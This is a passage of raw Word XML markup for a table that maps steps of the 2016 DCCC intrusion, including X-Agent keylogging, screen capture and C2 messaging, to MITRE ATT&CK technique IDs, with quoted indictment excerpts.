                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5ECDDE5F" w14:textId="1AA8D61F" w:rsidR="004D2E05" w:rsidRPr="00B857D7" w:rsidRDefault="00B61437" w:rsidP="004D2E05">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0FD2CD1E" w14:textId="30B95677" w:rsidR="004D2E05" w:rsidRPr="00105B0A" w:rsidRDefault="004D2E05" w:rsidP="004D2E05">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00105B0A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[2] </w:t>
            </w:r>
            <w:r w:rsidR="00B33B9D">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communicate with its C2 servers</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1AD8BBC1" w14:textId="241C8B46" w:rsidR="004D2E05" w:rsidRPr="00105B0A" w:rsidRDefault="004D2E05" w:rsidP="004D2E05">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00105B0A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Message Out/In</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00285F73" w:rsidRPr="00ED5880" w14:paraId="0F7381E8" w14:textId="77777777" w:rsidTr="008D2933">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4401926A" w14:textId="784FEFC8" w:rsidR="00285F73" w:rsidRPr="00ED5880" w:rsidRDefault="004230DB" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B5AB7BD" w14:textId="7207769D" w:rsidR="00285F73" w:rsidRPr="00ED5880" w:rsidRDefault="00D0002F" w:rsidP="008D2933">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08" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="32478F39" w14:textId="4F34AC05" w:rsidR="00285F73" w:rsidRPr="00ED5880" w:rsidRDefault="004230DB" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="004230DB">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1056.001 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="004230DB">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;Input Capture&gt;:Keylogging</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7E4E5512" w14:textId="57E06708" w:rsidR="00285F73" w:rsidRPr="00ED5880" w:rsidRDefault="004230DB" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1E228BCD" w14:textId="77777777" w:rsidR="00285F73" w:rsidRPr="00ED5880" w:rsidRDefault="00285F73" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2E59FF7B" w14:textId="56DD938B" w:rsidR="00285F73" w:rsidRPr="00ED5880" w:rsidRDefault="004230DB" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4DAADA83" w14:textId="2CF2B594" w:rsidR="00285F73" w:rsidRPr="00ED5880" w:rsidRDefault="001757D6" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>AO-COL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2E8DC2B6" w14:textId="7FC0D548" w:rsidR="00285F73" w:rsidRPr="00ED5880" w:rsidRDefault="00105B0A" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">[1] The </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>keylog</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> function allowed the Conspirators to capture keystrokes entered by DCCC employees</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00105B0A" w:rsidRPr="00B857D7" w14:paraId="5B9BC47F" w14:textId="77777777" w:rsidTr="008D2933">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="240D96DE" w14:textId="5C756F3D" w:rsidR="00105B0A" w:rsidRDefault="00105B0A" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="386185B6" w14:textId="77777777" w:rsidR="00105B0A" w:rsidRPr="00B857D7" w:rsidRDefault="00105B0A" w:rsidP="008D2933">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08" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="10536066" w14:textId="32098781" w:rsidR="00105B0A" w:rsidRPr="00B857D7" w:rsidRDefault="008001A4" w:rsidP="008D2933">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69A5F541" w14:textId="52F0A9A6" w:rsidR="00105B0A" w:rsidRPr="00B857D7" w:rsidRDefault="00105B0A" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1EBEB467" w14:textId="77777777" w:rsidR="00105B0A" w:rsidRPr="00B857D7" w:rsidRDefault="00105B0A" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="151B9B94" w14:textId="77777777" w:rsidR="00105B0A" w:rsidRDefault="00105B0A" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5F2C2D2B" w14:textId="16694326" w:rsidR="00105B0A" w:rsidRPr="00B857D7" w:rsidRDefault="001757D6" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3CCDB180" w14:textId="753FEECE" w:rsidR="00105B0A" w:rsidRPr="00105B0A" w:rsidRDefault="00105B0A" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00105B0A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[2] </w:t>
            </w:r>
            <w:r w:rsidR="00B33B9D">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communicate with its C2 servers</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A1F3E09" w14:textId="77777777" w:rsidR="00105B0A" w:rsidRPr="00105B0A" w:rsidRDefault="00105B0A" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00105B0A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Message Out/In</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A717F0" w:rsidRPr="00ED5880" w14:paraId="0CA527E9" w14:textId="77777777" w:rsidTr="008D2933">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="14483F3D" w14:textId="0048A773" w:rsidR="00A717F0" w:rsidRPr="00ED5880" w:rsidRDefault="00A717F0" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="32AECBCC" w14:textId="77777777" w:rsidR="00A717F0" w:rsidRPr="00ED5880" w:rsidRDefault="00A717F0" w:rsidP="008D2933">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08" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="76CD1345" w14:textId="4B60E7B2" w:rsidR="00A717F0" w:rsidRPr="00ED5880" w:rsidRDefault="00A717F0" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004230DB">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="004230DB">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00890F6A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>113</w:t>
            </w:r>
            <w:r w:rsidRPr="004230DB">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="004230DB">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00890F6A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Screen Capture</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="346926D1" w14:textId="592E7F29" w:rsidR="00A717F0" w:rsidRPr="00ED5880" w:rsidRDefault="00A717F0" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4102F75E" w14:textId="77777777" w:rsidR="00A717F0" w:rsidRPr="00ED5880" w:rsidRDefault="00A717F0" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="29D8AA04" w14:textId="77777777" w:rsidR="00A717F0" w:rsidRPr="00ED5880" w:rsidRDefault="00A717F0" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="77FF1F43" w14:textId="7BE5F987" w:rsidR="00A717F0" w:rsidRPr="00ED5880" w:rsidRDefault="001757D6" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>AO-COL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="08C23364" w14:textId="77777777" w:rsidR="00810CFE" w:rsidRDefault="00A717F0" w:rsidP="00810CFE">
            <w:r>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidR="00810CFE">
              <w:t>April 14, 2016, the Conspirators repeatedly activated</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D3A28B8" w14:textId="77777777" w:rsidR="00810CFE" w:rsidRDefault="00810CFE" w:rsidP="00810CFE">
            <w:r>
              <w:t xml:space="preserve">X-Agent’s </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>keylog</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> and screenshot functions to </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>surveil</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> DCCC Employee 1’s </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="115F35F1" w14:textId="5B38E6D2" w:rsidR="00A717F0" w:rsidRPr="00ED5880" w:rsidRDefault="00810CFE" w:rsidP="00810CFE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>computer activity over the course of eight hours</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00890F6A" w:rsidRPr="00ED5880" w14:paraId="3A733AAC" w14:textId="77777777" w:rsidTr="008D2933">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="30220B2C" w14:textId="70E9A349" w:rsidR="00890F6A" w:rsidRPr="00ED5880" w:rsidRDefault="00890F6A" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="25137552" w14:textId="77777777" w:rsidR="00890F6A" w:rsidRPr="00ED5880" w:rsidRDefault="00890F6A" w:rsidP="008D2933">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08" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="76889890" w14:textId="77777777" w:rsidR="00890F6A" w:rsidRPr="00ED5880" w:rsidRDefault="00890F6A" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="004230DB">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1056.001 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="004230DB">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;Input Capture&gt;:Keylogging</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7151BAFB" w14:textId="41AD3CAE" w:rsidR="00890F6A" w:rsidRPr="00ED5880" w:rsidRDefault="00890F6A" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="677F13F6" w14:textId="77777777" w:rsidR="00890F6A" w:rsidRPr="00ED5880" w:rsidRDefault="00890F6A" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="112DAA0C" w14:textId="77777777" w:rsidR="00890F6A" w:rsidRPr="00ED5880" w:rsidRDefault="00890F6A" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1FE1547F" w14:textId="40A29E43" w:rsidR="00890F6A" w:rsidRPr="00ED5880" w:rsidRDefault="001757D6" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>AO-COL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="22734037" w14:textId="77777777" w:rsidR="00890F6A" w:rsidRPr="00ED5880" w:rsidRDefault="00890F6A" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">[1] The </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>keylog</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> function allowed the Conspirators to capture keystrokes entered by DCCC employees</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA7A26" w:rsidRPr="00B857D7" w14:paraId="2541C09F" w14:textId="77777777" w:rsidTr="008D2933">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7E564ECF" w14:textId="1A8E3346" w:rsidR="00FA7A26" w:rsidRDefault="00FA7A26" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="501A5136" w14:textId="77777777" w:rsidR="00FA7A26" w:rsidRPr="00B857D7" w:rsidRDefault="00FA7A26" w:rsidP="008D2933">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08" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1CAA61C1" w14:textId="1133365E" w:rsidR="00FA7A26" w:rsidRPr="00B857D7" w:rsidRDefault="008001A4" w:rsidP="008D2933">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4F74FA7C" w14:textId="471464ED" w:rsidR="00FA7A26" w:rsidRPr="00B857D7" w:rsidRDefault="00FA7A26" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="55BA4AED" w14:textId="77777777" w:rsidR="00FA7A26" w:rsidRPr="00B857D7" w:rsidRDefault="00FA7A26" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="66D944CE" w14:textId="77777777" w:rsidR="00FA7A26" w:rsidRDefault="00FA7A26" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="38318374" w14:textId="41B41E0F" w:rsidR="00FA7A26" w:rsidRPr="00B857D7" w:rsidRDefault="001757D6" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
          </w:tcPr>
